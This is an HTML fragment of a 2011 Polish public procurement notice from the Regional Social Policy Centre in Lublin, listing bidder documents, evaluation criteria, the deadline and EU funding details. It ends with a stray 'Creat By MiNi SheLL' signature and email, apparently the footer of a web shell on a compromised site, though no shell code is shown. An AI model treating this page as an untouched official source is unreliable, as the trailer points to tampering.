<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie</li>

</ul>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - doświadczenie  w ykonywaniu materiałów promocyjnych - 10</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>2.	Zmiany zakresu rzeczowego dostaw mogą nastąpić w przypadkach, których Zamawiający nie mógł przewidzieć w chwili podpisywania umowy, a w szczególności:
-	definitywnego wycofania przedmiotu umowy  z obrotu; 
-	zmiana sposobu konfekcjonowania, postaci przedmiotu umowy</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.rops.lubelskie.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Regionalny Ośrodek Polityki Społecznej w lublinie
ul. Zana 38.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 27.05.2011 godzina 08:00, miejsce: Regionalny Ośrodek Polityki Społecznej w lublinie
ul. Zana 38
sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Umowa niniejsza współfinansowana jest ze środków
Unii Europejskiej z Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki na
podstawie Porozumienia Ramowego z dnia 12 grudnia 2007 r. z późn. zm. podpisanego z Wojewódzkim Urzędem
Pracy w Lublinie -Instytucją Pośredniczącą realizowanego przez Regionalny Ośrodek Polityki Społecznej w
Lublinie - projektu systemowego Szkolenie i doradztwo podnoszące kwalifikacje pracowników instytucji pomocy
i integracji społecznej.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com